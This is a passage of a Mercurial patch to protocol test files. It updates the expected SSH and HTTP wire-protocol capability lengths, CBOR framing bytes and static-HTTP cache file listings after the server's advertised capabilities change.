protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n i> write(98) -> 98: i> between\n @@ -1343,8 +1342,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1381,8 +1380,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1431,8 +1430,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1461,8 +1460,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1492,8 +1491,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1525,8 +1524,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1559,8 +1558,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1595,8 +1594,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1634,8 +1633,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1674,8 +1673,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -1726,8 +1725,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1759,8 +1758,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1809,8 +1808,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1847,8 +1846,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1886,8 +1885,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1922,8 +1921,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -1959,8 +1958,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -1992,8 +1991,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending listkeys command @@ -2030,8 +2029,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2071,8 +2070,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending pushkey command @@ -2137,8 +2136,8 @@ i> 0000000000000000000000000000000000000000-0000000000000000000000000000000000000000 i> flush() -> None o> readline() -> 4: - o> 463\n - o> readline() -> 463: + o> 444\n + o> readline() -> 444: o> capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash\n o> readline() -> 2: o> 1\n @@ -2177,8 +2176,8 @@ o> readline() -> 62: o> upgraded * exp-ssh-v2-0003\n (glob) o> readline() -> 4: - o> 462\n - o> read(462) -> 462: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + o> 443\n + o> read(443) -> 443: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash o> read(1) -> 1: o> \n sending batch with 3 sub-commands diff --git a/tests/test-ssh.t b/tests/test-ssh.t --- a/tests/test-ssh.t +++ b/tests/test-ssh.t @@ -518,7 +518,7 @@ devel-peer-request: pairs: 81 bytes sending hello command sending between command - remote: 463 (sshv1 !) + remote: 444 (sshv1 !) protocol upgraded to exp-ssh-v2-0003 (sshv2 !) remote: capabilities: batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset getbundle known lookup protocaps pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash remote: 1 (sshv1 !) @@ -537,7 +537,7 @@ no changes found devel-peer-request: getbundle devel-peer-request: bookmarks: 1 bytes - devel-peer-request: bundlecaps: 289 bytes + devel-peer-request: bundlecaps: 270 bytes devel-peer-request: cg: 1 bytes devel-peer-request: common: 122 bytes devel-peer-request: heads: 122 bytes diff --git a/tests/test-static-http.t b/tests/test-static-http.t --- a/tests/test-static-http.t +++ b/tests/test-static-http.t @@ -231,8 +231,6 @@ /.hg/bookmarks /.hg/bookmarks.current /.hg/cache/hgtagsfnodes1 - /.hg/cache/rbc-names-v1 - /.hg/cache/rbc-revs-v1 /.hg/dirstate /.hg/requires /.hg/store/00changelog.i @@ -248,8 +246,6 @@ /remote-with-names/.hg/bookmarks.current /remote-with-names/.hg/cache/branch2-served /remote-with-names/.hg/cache/hgtagsfnodes1 - /remote-with-names/.hg/cache/rbc-names-v1 - /remote-with-names/.hg/cache/rbc-revs-v1 /remote-with-names/.hg/cache/tags2-served /remote-with-names/.hg/dirstate /remote-with-names/.hg/localtags @@ -266,7 +262,6 @@ /remote/.hg/cache/branch2-served /remote/.hg/cache/hgtagsfnodes1 /remote/.hg/cache/rbc-names-v1 - /remote/.hg/cache/rbc-revs-v1 /remote/.hg/cache/tags2-served /remote/.hg/dirstate /remote/.hg/localtags @@ -288,8 +283,6 @@ /sub/.hg/bookmarks /sub/.hg/bookmarks.current /sub/.hg/cache/hgtagsfnodes1 - /sub/.hg/cache/rbc-names-v1 - /sub/.hg/cache/rbc-revs-v1 /sub/.hg/dirstate /sub/.hg/requires /sub/.hg/store/00changelog.i diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -150,7 +150,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -190,7 +190,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa0Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -223,7 +223,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash cbor> [ { b'apibase': b'api/', @@ -484,7 +484,7 @@ s> Content-Type: application/mercurial-cbor\r\n s> Content-Length: *\r\n (glob) s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash sending capabilities command s> setsockopt(6, 1, 1) -> None 